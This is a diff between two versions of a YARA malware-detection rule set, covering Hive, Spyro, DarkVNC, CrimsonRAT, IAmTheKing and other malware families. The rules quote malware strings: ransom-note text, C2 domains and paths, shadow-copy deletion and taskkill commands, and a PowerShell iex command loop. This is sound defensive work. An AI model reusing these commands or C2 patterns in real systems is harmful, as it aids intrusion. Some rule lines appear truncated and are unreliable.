73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00 - 65 00 } - $s2 = "Writing is not alowed" wide - $s3 = "System\\ProcessList.txt" fullword wide - $s4 = "[X] GetSSL ::" fullword wide - $s5 = "Failed to steal " wide - $s6 = "StealerStub" fullword ascii - $s7 = "/C chcp 65001 && netsh" wide - $n1 = "fetch_options" fullword wide - $n2 = "send_report" fullword wide - $n3 = "?username=" fullword wide + $ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide + $s1 = "" fullword wide + $s2 = "WebClient" fullword ascii + $s3 = "WriteAllText" fullword ascii + $s4 = "DownloadString" fullword ascii + $s5 = "WriteByte" fullword ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and any of them ) or all of ($n*) or 5 of ($s*) or (1 of ($n*) and 3 of ($s*))) + uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($ua*) and ($s1) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Tofsee : FILE +rule DITEKSHEN_MALWARE_Win_Hive : FILE { meta: - description = "Detects Tofsee" + description = "Detects Hive ransomware" author = "ditekSHen" - id = "86371c0b-72f9-56c0-9f34-f14d2a069c91" - date = "2024-09-06" - modified = "2024-09-06" + id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8933-L8949" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6610-L6647" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide - $s2 = "loader_id" fullword ascii - $s3 = "start_srv" fullword ascii - $s4 = "lid_file_upd" fullword ascii - $s5 = "localcfg" fullword ascii - $s6 = "Incorrect respons" fullword ascii - $s7 = "mx connect error" fullword ascii - $s8 = "Error sending command (sent = %d/%d)" fullword ascii - $s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii + $url1 = "http://hivecust" ascii + $url2 = "http://hiveleakdb" ascii + $s1 = "encrypt_files.go" ascii + $s2 = "erase_key.go" ascii + $s3 = "kill_processes.go" ascii + $s4 = "remove_shadow_copies.go" ascii + $s5 = "stop_services_windows.go" ascii + $s6 = "remove_itself_windows.go" ascii + $x1 = "/encryptor/" ascii + $x2 = "HOW_TO_DECRYPT.txt" ascii + $x3 = "FilesEncrypted" fullword ascii + $x4 = "EncryptionStarted" fullword ascii + $x5 = "encryptFilesGroup" fullword ascii + $x6 = "Your data will be undecryptable" ascii + $x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii + $v1_1 = ".EncryptFiles." ascii + $v1_2 = ".EncryptFilename." ascii + $v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii + $v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii + $v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii + $v1_6 = "path/filepath.WalkDir" ascii + $v2_1 = "taskkill /f /im" ascii + $v2_2 = "schtasks /delete /tn" ascii + $v2_3 = "encfile.txt" ascii + $v2_4 = "README.html" ascii + $v2_5 = "total encrypt %v/%v" ascii + $v2_6 = "ITSSHOWKEY" ascii + $v2_7 = "Recovery your files." ascii + $v2_8 = "yaml:\"send_host\"" ascii + $v2_9 = "yaml:\"ignore_dir\"" ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and ( all of ($url*) or all of ($s*) or 4 of ($x*) or 5 of ($v1*) or 5 of ($v2*) or (4 of ($v2*) and #v2_1>10)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Khonsari : FILE +rule DITEKSHEN_MALWARE_Win_Spyro : FILE { meta: - description = "Detects Khonsari ransomware" + description = "Detects Spyro / VoidCrypt / Limbozar ransomware" author = "ditekSHen" - id = "2d562e62-a948-570d-8ff2-cc4835b91573" - date = "2024-09-06" - modified = "2024-09-06" + id = "8b3273c4-827e-50ce-983e-a5843f6b5a78" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8951-L8963" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6649-L6675" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = ".khonsari" fullword wide nocase - $s1 = "Encrypt" fullword ascii - $s2 = "CreateEncryptor" fullword ascii - $s3 = "GenerateKey" fullword ascii - $s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii + $s1 = "Decrypt-info.txt" ascii wide + $s2 = "AbolHidden" ascii wide + $s3 = "C:\\ProgramData\\prvkey" ascii wide + $s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii + $s5 = "C:\\Users\\LEGION\\" ascii + $s6 = "C:\\ProgramData\\pkey.txt" fullword ascii + $s7 = ".Spyro" fullword ascii + $m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide + $m2 = "saving prvkey.txt.key file will cause" wide + $m3 = "in Case of no Answer:" wide + $m4 = "send us prvkey*.txt.key" wide + $m5 = "Somerhing went wrong while writing payload on disk" ascii + $m6 = "this country is forbidden.\"}" ascii + $c1 = "Voidcrypt/1.0" ascii + $c2 = "h1dd3n.cc" ascii + $c3 = "/voidcrypt/index.php" ascii + $c4 = "&user=" ascii + $c5 = "&disk-size=" ascii + $c6 = "unique-id=" ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 2 of ($s*)) or ( all of ($s*))) + uint16(0)==0x5a4d and (5 of ($s*) or 4 of ($c*) or 3 of ($m*) or 8 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Quantum : FILE +rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE { meta: - description = "Detects Quantum locker / ransomware" + description = "Detects DarkVNC" author = "ditekSHen" - id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f" - date = "2024-09-06" - modified = "2024-09-06" + id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8965-L8987" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6677-L6696" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "\\tQuantum" ascii wide - $x2 = "Quantum Locker.

" ascii wide - $s1 = "ERROR" fullword wide - $s2 = ".log" fullword wide - $s3 = "SLOW" fullword wide - $s4 = "Create" fullword wide - $s5 = "Integrity" fullword wide - $s6 = "Disabled" fullword wide - $s7 = "Deny" fullword wide - $s8 = "FAST" fullword wide - $s9 = "Mandatory" fullword wide - $s10 = "plugin.dll" fullword ascii - $s11 = "NetGetDCName" fullword ascii - $s12 = "NetShareEnum" fullword ascii - $s13 = "NetGetJoinInformation" fullword ascii + $s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide + $s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide + $s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii + $s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii + $s5 = "PRM_STRG" fullword wide + $s6 = "bot_shell >" ascii + $s7 = "monitor_off / monitor_on" ascii + $s8 = "kbd_off / kbd_on" ascii + $s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii + $s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii + $s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii + $s12 = "#hvnc" fullword ascii condition: - ( uint16(0)==0x5a4d and ( all of ($x*) or 9 of ($s*) or (pe.number_of_exports==2 and pe.exports("RunW") and pe.exports("runW") and 5 of ($s*)))) or all of ($x*) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Owowa : FILE +rule DITEKSHEN_MALWARE_Win_RSJON : FILE { meta: - description = "Detects Owowa" + description = "Detects RSJON / Ryzerlo / HiddenTear ransomware" author = "ditekSHen" - id = "c0a61601-e810-5acc-91a3-fa70db6d94da" - date = "2024-09-06" - modified = "2024-09-06" + id = "7cc3e863-b594-51a9-9d41-68021ce3b97c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8989-L9007" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6698-L6727" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda" score = 75 - quality = 75 + quality = 48 tags = "FILE" strings: - $u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide - $u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide - $u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide - $s1 = "powershell.exe" fullword wide - $s2 = "" wide - $s3 = "HealthMailbox" fullword wide - $s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii - $s5 = "b__" ascii - $s6 = "ClearHeaders" fullword ascii - $s7 = "get_UserHostAddress" fullword ascii - $s8 = "ExtenderControlDesigner" fullword ascii + $pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii + $pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii + $pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii + $x1 = "READ_ME_PLZ.txt" wide + $x2 = "Files has been encrypted with rs-jon" wide + $x3 = ".rsjon" wide + $x4 = "bitcoins or kebab" wide + $x5 = /rs[-_]jon/ fullword ascii wide + $s1 = "SPIF_UPDATEINIFILE" fullword ascii + $s2 = "SPI_SETDESKWALLPAPER" fullword ascii + $s3 = "bytesToBeEncrypted" fullword ascii + $s4 = "SendPassword" fullword ascii + $s5 = "EncryptFile" ascii + $s6 = "fWinIni" fullword ascii + $s7 = "BTCAdress" fullword ascii + $s8 = "self_destruck" fullword ascii + $c1 = "?computer_name=" wide + $c2 = "&serialnumber=" wide + $c3 = "&password=" wide + $c4 = "&allow=ransom" wide + $c5 = "://darkjon.tk/" wide + $c6 = "/rnsm/write.php" wide condition: - uint16(0)==0x5a4d and ( all of ($u*) or (2 of ($u*) and 3 of ($s*)) or 6 of ($s*)) + uint16(0)==0x5a4d and (3 of ($x*) or 6 of ($s*) or 4 of ($c*) or (2 of ($c*) and 4 of ($s*)) or (1 of ($pdb*) and 1 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Chebka : FILE +rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE { meta: - description = "Detects Chebka" + description = "Detects IndigoZebra BoxCaon" author = "ditekSHen" - id = "df486522-695c-56f5-b93a-6f16829a3a3e" - date = "2024-09-06" - modified = "2024-09-06" + id = "becbde73-8b72-5e98-8684-87068ffff71b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9009-L9030" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6729-L6746" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "-k netsvcs" wide - $s2 = "%ssvchost.exe -k SystemNetworkService" wide - $s3 = "Mozilla/4.0 (compatible)" wide - $s4 = "_kasssperskdy" wide - $s5 = "winssyslog" wide - $s6 = "LoaderDll%d" wide - $s7 = "cmd.exe /c rundll32.exe shell32.dll," wide - $s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide - $f1 = ".?AVCHVncManager@@" fullword ascii - $f2 = ".?AVCNetstatManager@@" fullword ascii - $f3 = ".?AVCTcpAgentListener@@" fullword ascii - $f4 = ".?AVIUdpClientListener@@" fullword ascii - $f5 = ".?AVCShellManager@@" fullword ascii - $f6 = ".?AVCScreenSpy@@" fullword ascii + $s1 = "" fullword wide + $s2 = "" fullword wide + $s3 = "C:\\Users\\Public\\%d\\" fullword wide + $s4 = "api.dropboxapi.com" fullword wide + $s5 = "/2/files/upload" fullword wide + $ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide + $ts2 = "%s /A /C \"%s\" > %s" ascii wide + $ts3 = "ersInfo" ascii wide + $ts4 = "%svmpid%d.log" ascii wide + $ts5 = "%scscode%d.log" ascii wide condition: - uint16(0)==0x5a4d and (5 of ($s*) or all of ($f*) or (3 of ($f*) and 3 of ($s*)) or (#s8>2 and 5 of them )) + ( uint16(0)==0x5a4d and all of ($s*)) or all of ($ts*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Flagpro : FILE +rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE { meta: - description = "Detects Flagpro" + description = "Hunt for AvosLocker ransomware" author = "ditekSHen" - id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e" - date = "2024-09-06" - modified = "2024-09-06" + id = "390e57b2-207e-5013-899a-0b04aa63a56f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9032-L9049" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6748-L6757" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "download...." fullword ascii - $s2 = "~MYTEMP" fullword wide - $s3 = ".?AVCV20_LoaderApp@@" fullword ascii - $s4 = ".?AVCV20_LoaderDlg@@" fullword ascii - $s5 = "ExecYes" fullword ascii - $s6 = /1 and 4 of them )) + uint16(0)==0x5a4d and 12 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Maze : FILE +rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE { meta: - description = "Detects Maze ransomware" + description = "Detects CrimsonRAT" author = "ditekSHen" - id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8" - date = "2024-09-06" - modified = "2024-09-06" + id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9116-L9145" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6896-L6920" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii - $s1 = "\"%s\" shadowcopy delete" wide - $s2 = "[%windir%\\system32\\wbem\\wmic" wide - $s3 = "process call create \"cmd /c start %s\"" wide - $s4 = "DECRYPT-FILES.html" fullword wide - $s5 = "Dear %s, your files" wide - $s6 = "%s! Alert! %s! Alert!" wide - $s7 = "%BASE64_PLACEHOLDER%" fullword ascii - $s8 = "-orDGorX0or" fullword ascii - $s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31 - 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 - 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e - 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 - 76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20 - 48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 - 67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20 - 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 - 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 - 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63 - 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 - 0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e - 74 2d 4c 65 6e 67 74 68 3a 20 00 } + $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide + $s2 = "system volume information|" fullword wide + $s3 = "program files (x86)|" fullword wide + $s4 = "program files|" fullword wide + $s5 = "(connect|command|drives|getfiles|upload|execute|download)/ fullword wide + $x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide + $x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide + $f1 = "b__" ascii + $f2 = "b__" ascii + $f3 = "b__" ascii + $f4 = "b__" ascii + $f5 = "b__" ascii + $f6 = "b__" ascii + $f7 = "b__" ascii + $s1 = "beaconURL" ascii + $s2 = "PingReply" ascii + $s3 = "updateUpload" ascii + $s4 = "updateCommand" ascii + $s5 = "runCommand" ascii + $s6 = "uploadFile" ascii + $s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide + $s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide + $s9 = "Mozilla/3.0" fullword wide + $s10 = "|directory|N/A|" fullword wide + $s11 = "cmd.exe /c" fullword wide + $c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide + $c2 = /(classification|updatecs|update|beacon)\.php/ wide + $c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide + $pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii + $pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii condition: - uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($e*) and 2 of ($s*))) + uint16(0)==0x5a4d and (#x1>5 or ( all of ($f*) and (1 of ($s*) or 2 of ($c*))) or 7 of ($s*) or all of ($c*) or ( all of ($pdb*) and 4 of them ) or (2 of ($x*) and 5 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE +rule DITEKSHEN_MALWARE_Win_Nodachi : FILE { meta: - description = "Detects LokiLocker ransomware" + description = "Detects Nodachi infostealer" author = "ditekSHen" - id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1" - date = "2024-09-06" - modified = "2024-09-06" + id = "bce0c44d-7e75-5c51-ba93-75bd81896921" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9169-L9194" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6957-L6972" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "SOFTWARE\\Loki" fullword wide - $x2 = "Cpriv.Loki" fullword wide - $x3 = "Loki/" wide - $x4 = /loki(\s)?locker/ fullword wide nocase - $s1 = "Restore-My-Files.txt" wide - $s2 = "loading encryption keys" wide - $s3 = "Kill switch -> enabled" wide - $s4 = "ScanSMBShares" fullword ascii - $s5 = "RewriteMBR" fullword ascii - $s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii - $n1 = "unique-id=" ascii wide - $n2 = "&disk-size=" ascii wide - $n3 = "&user=Darwin&cpu-name=" ascii wide - $n4 = "&ram-size=" ascii wide - $n5 = "&os-name=" ascii wide - $n6 = "&chat-id=" ascii wide - $n7 = "&msg-id=" ascii wide - $n8 = "&elapsed-time=" ascii wide + $x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii + $s1 = "/upload/drive/v3/files/{fileId}" ascii + $s2 = "main.getTokenFromWeb" ascii + $s3 = "main.tokenFromFile" ascii + $s4 = "/goLazagne/" ascii + $s5 = "/extractor/withoutdrive/main.go" ascii + $s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii + $s7 = "C://Users//public//cred.json" ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or 4 of ($s*) or 6 of ($n*) or (3 of ($s*) and 3 of ($n*)) or (1 of ($x*) and (2 of ($s*) or 2 of ($n*)))) + uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or (4 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE +rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE { meta: - description = "Attemp at hunting for DazzleSpy" + description = "IAmTheKing Queen Of Hearts payload" author = "ditekSHen" - id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5" - date = "2024-09-06" - modified = "2024-09-06" + id = "b8d222f0-b3ce-5143-816b-4bbcde645672" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9196-L9210" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470" - score = 50 - quality = 71 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6974-L6991" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d" + score = 75 + quality = 75 tags = "FILE" strings: - $x1 = "/osxrk_commandline/" ascii wide nocase - $x2 = "/Users/wangping/pangu/" ascii wide nocase - $s1 = "heartbeat" ascii wide - $s2 = "scanFiles" ascii wide - $s3 = "restartCMD" ascii wide - $s4 = "downloadFile" ascii wide - $s5 = "RDPInfo" ascii wide + $s1 = "{'session':[{'name':'" ascii + $s2 = "begin mainthread ok" wide + $s3 = "getcommand error" wide + $s4 = "querycode error" wide + $s5 = "Code = %d" wide + $s6 = "cookie size :%d" wide + $s7 = "send request error:%d" wide + $s8 = "PmMytex%d" wide + $s9 = "%s_%c%c%c%c_%d" wide + $s10 = "?what@exception@std@@UBEPBDXZ" ascii condition: - uint16(0)==0xfacf and ( all of ($x*) or all of ($s*) or (1 of ($x*) and 3 of ($s*))) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Bhunt : FILE +rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE { meta: - description = "Detects BHunt infostealer" + description = "IAmTheKing Queen Of Clubs payload" author = "ditekSHen" - id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830" - date = "2024-09-06" - modified = "2024-09-06" + id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9212-L9233" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6993-L7007" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "BHUNT.Resources.resources" fullword ascii - $x2 = "//minecraftsquid.hopto.org/" wide - $s1 = "chaos_crew" ascii wide - $s2 = "golden7" ascii wide - $s3 = "mrpropper" ascii wide - $s4 = "/ifo.php?" ascii wide - $s5 = "bonanza=:=" ascii wide - $s6 = "blackjack=:=" ascii wide - $s7 = "SendPostData" fullword ascii - $c1 = "cmd /c REG ADD" wide - $c2 = "taskkill /F /IM" wide - $c3 = "cmd.exe /c wmic" wide - $g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii - $g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii + $s1 = "Not Support!" fullword wide + $s2 = "%s|%s|%s|%s" fullword wide + $s3 = "cmd.exe" fullword wide + $s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide + $s5 = "PowerShell.exe -nop -c %s" fullword wide + $s6 = "%s \"%s\" Df" fullword wide + $s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or (1 of ($x*) and (5 of ($s*) or 2 of ($c*))) or (6 of ($s*) and 2 of ($c*)) or ( all of ($g*) and 2 of them )) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Lorenz : FILE +rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE { meta: - description = "Detects Lorenz ransomware" + description = "IAmTheKing payload" author = "ditekSHen" - id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470" - date = "2024-09-06" - modified = "2024-09-06" + id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9235-L9265" - license_url = 